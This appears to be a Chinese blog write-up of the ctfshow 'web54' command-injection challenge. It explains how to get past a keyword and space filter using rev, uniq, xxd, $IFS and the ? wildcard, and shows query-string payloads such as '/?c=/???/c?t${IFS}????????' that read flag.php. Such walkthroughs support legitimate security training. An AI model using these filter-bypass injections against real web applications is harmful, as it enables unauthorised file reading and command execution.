ctfshow——54命令执行,需要严格的过滤

本文介绍了一种在命令执行环境中绕过过滤的技术,利用特殊字符和命令替代实现目标。通过实例演示了如何使用如uniq、xxd等命令,并讨论了空格绕过的多种方法。

命令执行,需要严格的过滤

在这里插入图片描述了解一个正则表达式的小知识

.* 代表匹配0到无数个字符

我们通过读代码得知它过滤了很多内容 flag cat等等
那么我们就只好选择用?来代替我们要输入的内容的方式/或者用它没有匹配的方法,比如:

  1. uniq:用于检查及删除文本文件中重复出现的行列,一般与 sort 命令结合使用。
  2. xxd:命令转换二进制文件为十六进制文件
  3. rev:翻转读文件

来输入。绕过空格的方法:

  • %09 Tab键的URL编码
  • $IFS$9 $IFS是内部字段分隔符的缩写
  • ${IFS}
  • < 重定向符号

那么我们用?c=rev${IFS}fla?.php来试一下
在这里插入图片描述
在这里插入图片描述成功拿到flag
最后我们再将他逆置过来即可
在这里插入图片描述

我们也可以用一种不太精确的方式,即?代替被过滤的内容来达到我们的目的
在这里插入图片描述

/?c=/???/c?t${IFS}????????

即/?c=/bin/cat flag.php
在这里插入图片描述

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值